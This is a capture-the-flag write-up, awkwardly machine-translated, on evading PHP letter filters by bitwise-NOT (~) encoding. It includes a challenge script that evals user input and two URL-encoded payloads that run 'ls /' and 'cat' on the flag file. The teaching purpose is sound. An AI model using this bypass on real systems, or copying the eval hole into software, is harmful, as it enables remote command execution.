Knowledge point

Reverse filtration ： Reverse filtering is to reverse the command first , And then it's done url Finally, the code is inverted again when uploading .

Reverse filtering can bypass preg_match() All characters and numbers filtered .

Reverse script

<?php
echo urlencode(~' Reverse content ');
?> 

Get the negative result in url Input

(~ Reverse the result 1)(~ Reverse the result 2); 

Example

<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];
    foreach ($blacklist as $blackitem)
    {
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
        die("LTLT Say you can't use these strange symbols ！");
    }}
if(preg_match('/[a-zA-Z]/is',$wllm))
{
    die("Ra's Al Ghul Say you can't use letters ！");
}
echo "NoVic4 say ： Good boy , But you can get flag Do you ？";
eval($wllm);
}
else
{
    echo " Cai Zong said ： Pay attention to the examination ！！！";
}
?>  Cai Zong said ： Pay attention to the examination ！！！

In this code, regular filters all letters and some symbols , but ‘~’ Unfiltered . We can use the method of anti filtering to view the file . First we need to use commands system(ls /) View directory

We are right. system and (ls /) Don't take the opposite as %8C%86%8C%8B%9A%92 and %D7%93%8C%DF%D0%D6

payload: ?wllm=(~%8C%86%8C%8B%9A%92 )(~%D7%93%8C%DF%D0%D6);

Reuse command system(cat / flllllaaaaaaggggggg) see flllllaaaaaaggggggg The contents of the catalogue

The reverse operation is the same as

payload：?wllm=(~%8C%86%8C%8B%9A%92 )(~%D7%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98%D6);